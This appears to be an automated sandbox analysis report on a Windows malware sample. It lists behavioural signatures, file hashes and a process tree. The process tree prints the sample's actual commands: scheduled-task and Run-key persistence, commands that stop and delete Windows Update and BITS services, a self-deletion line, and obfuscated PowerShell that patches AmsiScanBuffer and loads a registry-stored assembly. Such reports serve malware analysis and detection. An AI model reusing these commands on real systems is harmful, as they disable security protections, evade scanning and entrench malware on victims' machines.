Analysis
-
max time kernel
249s -
max time network
272s -
platform
windows10-1703_x64 -
resource
win10-20220901-en -
resource tags
-
submitted
27-11-2022 04:00
General
-
Target
2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe
-
Size
1.1MB
-
MD5
01f89dd05027734cdf71f9923179a57a
-
SHA1
f6cbdf1f40fcc5349ff58245cb7d14d5a5113ac0
-
SHA256
2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a
-
SHA512
36328e775c5cb77663e8daec6f2d72356146e17201c0340624007f78de4c0ebb20cb4a282dc324893d8088463403a26a6fd2447f4c949d7fe0de00650d2c9bf1
-
SSDEEP
24576:+4j4a/KxTMoQvaBtu+vOQst38HZjbxiOJx7nTlbPujvb+nayzg8vk862s3vX/1rw:+WCGjL+2P8H5b0GnTlLYYDzgI961vXVk
Score
10/10
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
-
Stops running service(s) 3 TTPs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Drops file in Windows directory 1 IoCs
-
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 47 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 31 IoCs
-
Suspicious use of AdjustPrivilegeToken 9 IoCs
-
Suspicious use of WriteProcessMemory 43 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe"C:\Users\Admin\AppData\Local\Temp\2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /tn COMSurrogate /f /sc onlogon /rl highest /tr "C:\Users\Admin\pila hesahew tiragiy\pirihoq pereq kiyiw.exe"3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\pila hesahew tiragiy\pirihoq pereq kiyiw.exe"C:\Users\Admin\pila hesahew tiragiy\pirihoq pereq kiyiw.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\2497c8d6afda40002e0c177faa936b73c5ebf2c6e4f4bac482f67a7946e6218a.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comchcp 650014⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#vngabyebz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'nvdrivesllapi' /tr '''C:\Windows\system32\config\systemprofile\AppData\Roaming\WindowsMIT\nvdrivesllapi.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Windows\system32\config\systemprofile\AppData\Roaming\WindowsMIT\nvdrivesllapi.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'nvdrivesllapi' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "nvdrivesllapi" /t REG_SZ /f /d 'C:\Windows\system32\config\systemprofile\AppData\Roaming\WindowsMIT\nvdrivesllapi.exe' }2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\trpnse.exe"2⤵
-
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 33⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qisygekiu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "nvdrivesllapi" } Else { "C:\Windows\system32\config\systemprofile\AppData\Roaming\WindowsMIT\nvdrivesllapi.exe" }2⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn nvdrivesllapi3⤵
-
C:\Users\Admin\AppData\Local\Temp\trpnse.exeC:\Users\Admin\AppData\Local\Temp\trpnse.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:HgNcjxdMXfGi{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jIPFDcdxXtQULW,[Parameter(Position=1)][Type]$rhZlROcpaZ)$DkAcQIiWafi=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+[Char](108)+''+[Char](101)+'c'+[Char](116)+'ed'+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+''+'e'+''+[Char](109)+''+[Char](111)+''+'r'+''+'y'+''+[Char](77)+''+[Char](111)+''+[Char](100)+'ul'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+'e'+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+'eTy'+'p'+''+[Char](101)+'',''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+''+[Char](44)+''+[Char](83)+'e'+[Char](97)+''+[Char](108)+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+'n'+'s'+'i'+'C'+''+[Char](108)+'a'+[Char](115)+''+'s'+''+[Char](44)+''+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+'C'+'l'+[Char](97)+'ss',[MulticastDelegate]);$DkAcQIiWafi.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+'p'+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+'a'+''+'m'+''+[Char](101)+',H'+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$jIPFDcdxXtQULW).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+'e'+''+','+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+'e'+'d');$DkAcQIiWafi.DefineMethod('I'+[Char](110)+''+'v'+'ok'+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+','+[Char](72)+''+'i'+''+'d'+''+[Char](101)+''+'B'+''+'y'+''+[Char](83)+'i'+[Char](103)+','+[Char](78)+''+[Char](101)+'w'+[Char](83)+'l'+'o'+''+'t'+''+[Char](44)+''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+'l',$rhZlROcpaZ,$jIPFDcdxXtQULW).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+[Char](116)+'i'+'m'+'e'+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'ge'+'d'+'');Write-Output $DkAcQIiWafi.CreateType();}$kRFOgeEqdPRmc=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+[Char](116)+''+[Char](101)+''+'m'+'.'+[Char](100)+'ll')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+'s'+'of'+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+''+'2'+''+[Char](46)+''+[Char](85)+'n'+[Char](115)+''+[Char](97)+'f'+[Char](101)+''+[Char](107)+'RF'+'O'+''+[Char](103)+'eE'+[Char](113)+'d'+'P'+''+[Char](82)+'m'+[Char](99)+'');$UlTHQgxPWwRgsh=$kRFOgeEqdPRmc.GetMethod(''+[Char](85)+'l'+[Char](84)+'H'+[Char](81)+''+[Char](103)+'x'+[Char](80)+''+'W'+''+[Char](119)+'R'+[Char](103)+''+[Char](115)+''+[Char](104)+'',[Reflection.BindingFlags]''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+'i'+'c'+''+[Char](44)+'S'+[Char](116)+''+[Char](97)+'ti'+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$gIfSKjMpEqryDMWPJoj=HgNcjxdMXfGi @([String])([IntPtr]);$olMbjJomYtmqJYnOLqkmyU=HgNcjxdMXfGi @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$kQCrJmhLuQx=$kRFOgeEqdPRmc.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+'M'+''+'o'+''+[Char](100)+''+'u'+''+'l'+''+[Char](101)+'Ha'+[Char](110)+''+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+'r'+''+[Char](110)+''+[Char](101)+''+'l'+''+[Char](51)+''+'2'+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$VeKDcmfXstjbtj=$UlTHQgxPWwRgsh.Invoke($Null,@([Object]$kQCrJmhLuQx,[Object](''+[Char](76)+''+[Char](111)+'a'+[Char](100)+'Libr'+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$JZwFnjlQKuwzxuzfb=$UlTHQgxPWwRgsh.Invoke($Null,@([Object]$kQCrJmhLuQx,[Object](''+'V'+'ir'+'t'+''+[Char](117)+'a'+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+'t'+[Char](101)+''+'c'+''+[Char](116)+'')));$EJbSsgS=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VeKDcmfXstjbtj,$gIfSKjMpEqryDMWPJoj).Invoke('a'+[Char](109)+'s'+[Char](105)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$GnxeERxcxGpMHIQZd=$UlTHQgxPWwRgsh.Invoke($Null,@([Object]$EJbSsgS,[Object]('A'+'m'+''+'s'+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+'B'+'u'+''+[Char](102)+'fe'+[Char](114)+'')));$llVUkIZRsv=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JZwFnjlQKuwzxuzfb,$olMbjJomYtmqJYnOLqkmyU).Invoke($GnxeERxcxGpMHIQZd,[uint32]8,4,[ref]$llVUkIZRsv);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$GnxeERxcxGpMHIQZd,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JZwFnjlQKuwzxuzfb,$olMbjJomYtmqJYnOLqkmyU).Invoke($GnxeERxcxGpMHIQZd,[uint32]8,0x20,[ref]$llVUkIZRsv);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+'T'+''+[Char](87)+''+[Char](65)+''+[Char](82)+'E').GetValue(''+[Char](100)+'i'+[Char](97)+''+[Char](108)+''+[Char](101)+'r'+[Char](115)+''+'t'+''+'a'+''+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:XNCfRZUKfxwM{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uEOrTFFnfgXzMA,[Parameter(Position=1)][Type]$ctrbugQBxz)$ZZWHDSSHYoJ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+'e'+''+'c'+''+[Char](116)+'e'+'d'+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+'Me'+'m'+''+[Char](111)+''+'r'+''+'y'+''+'M'+''+[Char](111)+''+[Char](100)+'u'+'l'+''+'e'+'',$False).DefineType('My'+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+'e'+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+','+'P'+'u'+[Char](98)+'l'+'i'+''+'c'+''+[Char](44)+''+[Char](83)+'e'+[Char](97)+'led'+[Char](44)+''+'A'+''+[Char](110)+''+'s'+''+[Char](105)+''+[Char](67)+'las'+'s'+''+[Char](44)+''+[Char](65)+'u'+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+'ss',[MulticastDelegate]);$ZZWHDSSHYoJ.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+'p'+'e'+[Char](99)+''+'i'+''+'a'+''+'l'+''+[Char](78)+''+[Char](97)+'me'+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+','+[Char](80)+''+'u'+'bl'+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$uEOrTFFnfgXzMA).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+'e'+''+','+'M'+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');$ZZWHDSSHYoJ.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+'e','Pu'+[Char](98)+''+'l'+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+'g,N'+'e'+''+[Char](119)+''+[Char](83)+''+[Char](108)+'ot'+','+''+'V'+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+'a'+'l',$ctrbugQBxz,$uEOrTFFnfgXzMA).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $ZZWHDSSHYoJ.CreateType();}$PJwfLERYMbdeO=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+'d'+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+'t.'+[Char](87)+'i'+'n'+'3'+[Char](50)+'.U'+[Char](110)+''+[Char](115)+''+[Char](97)+'f'+[Char](101)+''+[Char](80)+''+[Char](74)+'w'+'f'+'LE'+[Char](82)+'Y'+[Char](77)+''+'b'+''+[Char](100)+''+'e'+''+[Char](79)+'');$kurPabOJWMrLtg=$PJwfLERYMbdeO.GetMethod('k'+[Char](117)+''+[Char](114)+''+[Char](80)+''+[Char](97)+'b'+[Char](79)+''+[Char](74)+''+[Char](87)+''+[Char](77)+''+[Char](114)+'Lt'+[Char](103)+'',[Reflection.BindingFlags]''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+'c'+''+[Char](44)+'S'+[Char](116)+''+[Char](97)+''+'t'+''+[Char](105)+''+'c'+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$wbmfDXyiGlegzgvlzrH=XNCfRZUKfxwM @([String])([IntPtr]);$RKNCDfRqDXUbObPqCKGJus=XNCfRZUKfxwM @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$lLaiIGwivos=$PJwfLERYMbdeO.GetMethod(''+[Char](71)+'etM'+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+'e'+'H'+[Char](97)+''+[Char](110)+''+[Char](100)+'l'+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+'ne'+'l'+''+[Char](51)+''+'2'+'.'+[Char](100)+'l'+[Char](108)+'')));$ohcvldSYZqIWpR=$kurPabOJWMrLtg.Invoke($Null,@([Object]$lLaiIGwivos,[Object](''+[Char](76)+''+'o'+''+'a'+'dL'+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+'y'+''+'A'+'')));$HwJvabWLayABdhCvV=$kurPabOJWMrLtg.Invoke($Null,@([Object]$lLaiIGwivos,[Object]('Vi'+[Char](114)+''+'t'+''+'u'+''+[Char](97)+''+'l'+'P'+[Char](114)+'o'+[Char](116)+''+[Char](101)+''+[Char](99)+''+'t'+'')));$mASVzsa=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ohcvldSYZqIWpR,$wbmfDXyiGlegzgvlzrH).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+'dl'+'l'+'');$TjFAicLorrFHASJXw=$kurPabOJWMrLtg.Invoke($Null,@([Object]$mASVzsa,[Object](''+'A'+''+[Char](109)+''+[Char](115)+'i'+[Char](83)+''+'c'+'an'+'B'+'u'+'f'+''+[Char](102)+'e'+[Char](114)+'')));$WtiqrlYCmS=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($HwJvabWLayABdhCvV,$RKNCDfRqDXUbObPqCKGJus).Invoke($TjFAicLorrFHASJXw,[uint32]8,4,[ref]$WtiqrlYCmS);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$TjFAicLorrFHASJXw,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($HwJvabWLayABdhCvV,$RKNCDfRqDXUbObPqCKGJus).Invoke($TjFAicLorrFHASJXw,[uint32]8,0x20,[ref]$WtiqrlYCmS);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+''+'T'+''+'W'+'A'+[Char](82)+''+'E'+'').GetValue('d'+[Char](105)+''+'a'+'l'+'e'+''+[Char](114)+''+[Char](115)+'t'+[Char](97)+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)1⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{5d2b2b08-7489-48c6-9dd1-70a3a4d35733}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3988 -s 7841⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3704 -s 8841⤵
- Program crash
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERBFE6.tmp.csvFilesize
30KB
MD56b47bcaef093ac8d25216e464f63db83
SHA193c23007d2e8f4c16a0be52bed025fa5ef58dd3b
SHA2566f30d90c72dbfae161a4cb3dd87cbd6fde64fac4f8383e93f352417f4cb5e3a9
SHA512f253eb3d73544f1dd6ae1db76ecda4c371c56e11142d99de631da9906a15559e13ab1bb2ab32b3d65dca0fd05ae452cb9437d622a97aa948a8ad878c1c96ff18
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERBFE7.tmp.csvFilesize
30KB
MD500407df67963f8dfae950790c0bf4fd3
SHA140bb828b6b51aebd1122a7f26970bea23851ba02
SHA256e3bfa618f46ee05d5871180e7d914513f8015b927fff16d4867c63c5d538f3aa
SHA512e9a2083f9f5e9e5677100b774f26a0bc9912e4127c31d87322d37ae341a44669ee264ca054ba0d108f454682e551039b213b67e8321288f591709cbde0ea94a4
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC007.tmp.txtFilesize
12KB
MD5e8b46d3edd5d90b156e2965896b39f9c
SHA1879faa14f5ffeee8fd7e285456292ca3a1af3bea
SHA256fce61e619f5f97d730166796285f20c44a3e876f35dcde42f3a54793989f0f39
SHA512399eca4d51ff1a2c2975840ad78bc064e164b2ff030feb0eba22788369ca62d3c25ff779566a8ebaaa4c686ef63bc81912289207a768afd0e9d45bb036faf2a1
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC008.tmp.txtFilesize
12KB
MD539023167a0dc15d61a0638713ab08cf2
SHA12ea7466860114cf7727a4f745fafa72606936f57
SHA2561f594b2e407fa107a872db3463aa0173c418341d3e291bc4c7f8e46b50b944d3
SHA512f86578cd7bbb37cc7e28460e34a3e597bd805cdce03a50746167512aa74742013f71cea616a62154468a2980439beb2064745f49e84411b78592630bfe8e6c3b
-
C:\Users\Admin\AppData\Local\Temp\trpnse.exeFilesize
10.0MB
MD5ce4164c119c97408d2e97898666ce565
SHA1a1c5d881fa81e69bd56d078e1801d361231d3e9a
SHA256f54cfee1c7ac44c8e208a8a9147ec1b2d34614d1cd70f05ef4f9b5b4beaf3bc2
SHA512683469fee65215724c89984fb3dbdde46a1dcc46beb3066ee117a319987ac99230c0ad5b16c6ffa30b213e024117091a874bace2fc28b31db5256a86589051b5
-
C:\Users\Admin\AppData\Local\Temp\trpnse.exeFilesize
10.0MB
MD5ce4164c119c97408d2e97898666ce565
SHA1a1c5d881fa81e69bd56d078e1801d361231d3e9a
SHA256f54cfee1c7ac44c8e208a8a9147ec1b2d34614d1cd70f05ef4f9b5b4beaf3bc2
SHA512683469fee65215724c89984fb3dbdde46a1dcc46beb3066ee117a319987ac99230c0ad5b16c6ffa30b213e024117091a874bace2fc28b31db5256a86589051b5
-
C:\Users\Admin\pila hesahew tiragiy\pirihoq pereq kiyiw.exeFilesize
718.2MB
MD5caeb0351d1c0cd1a67fd560207b680d4
SHA1cbc34d5217583ce5e96b2e27b617a2223dc20fe4
SHA256ade8112ea6edb870b48e317e30eda709a5781edd547c653fea305242912640c6
SHA5121236714fd65e21de74329c3c99671e25b80c7728bb31b5dbdcce58a763cef7576404fc7bdd60d99adc62f80d538b140ed4e78a7f1ee761e5739baece9af863a2
-
C:\Users\Admin\pila hesahew tiragiy\pirihoq pereq kiyiw.exeFilesize
795.1MB
MD5d4166d9a4e411bdc44a75d7923acda6d
SHA1c891f799e3211335e8310f5cc8266c3592efb183
SHA25699a42ebeeda6f7868252600b2be4a25365627e794bdea9bacd8795803c25f275
SHA512fb36347b3da3b9f310e99092b5e24413db6fa265a7149794b438629fe21a2c4f1a1eac133a98af70b002ed3512a31bafd254c0f64c108e9ef0f4f5982cc27cb6
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5a05a04187b397f5a08a9219efab9854f
SHA1a935822d378741decd42a81535910875940761f9
SHA25612826236ff6564c641375245a28539cb030e9574d7281601a582dd0ff2082d26
SHA51286a63c8825387a664682796f2f4e087c464e6f49ccfd841041ee34ac7b4adb9c012150a9b9a02bf3f131a346e67a05f2ffaa65e5191091406f89ca5b8dbd93ba
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5302a7c179ef577c237c5418fb770fd27
SHA1343ef00d1357a8d2ff6e1143541a8a29435ed30c
SHA2569e6b50764916c21c41d6e7c4999bdf27120c069ec7a9268100e1ce5df845149f
SHA512f2472371a322d0352772defb959ea0a9da0d5ca8f412f6abafac2e6547bcc8a53394a6fb81b488521fc256bfc9f3205d92c6b69d6d139bdb260fb46578946699
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD51046a928c5e3e9905b46663563d7d15c
SHA179d796268458c6e0b5080e19e24d517700bf828e
SHA2565090dc6fa1f1136263365d7099408f863f3a8abfd91daced811b0b130db42f57
SHA512286d32bd08adc82c2480c931570c8d8941a2d9d8e404e2ff4984c303a77d13e1980f70908809f8e35f06ca63ba44c0069b910cd0ff74a2b8558eecc4959ce754
-
memory/408-808-0x000001CCD8620000-0x000001CCD8647000-memory.dmpFilesize
156KB
-
memory/516-809-0x000002BA40CE0000-0x000002BA40D07000-memory.dmpFilesize
156KB
-
memory/596-763-0x000002721CDB0000-0x000002721CDD1000-memory.dmpFilesize
132KB
-
memory/596-802-0x000002721CDE0000-0x000002721CE07000-memory.dmpFilesize
156KB
-
memory/604-807-0x00000296930D0000-0x00000296930F7000-memory.dmpFilesize
156KB
-
memory/612-343-0x0000000000000000-mapping.dmp
-
memory/652-804-0x0000021558A70000-0x0000021558A97000-memory.dmpFilesize
156KB
-
memory/680-340-0x0000000000000000-mapping.dmp
-
memory/740-811-0x00000203BE8A0000-0x00000203BE8C7000-memory.dmpFilesize
156KB
-
memory/884-341-0x0000000000000000-mapping.dmp
-
memory/920-810-0x000001FC8AD90000-0x000001FC8ADB7000-memory.dmpFilesize
156KB
-
memory/1008-803-0x0000021A48380000-0x0000021A483A7000-memory.dmpFilesize
156KB
-
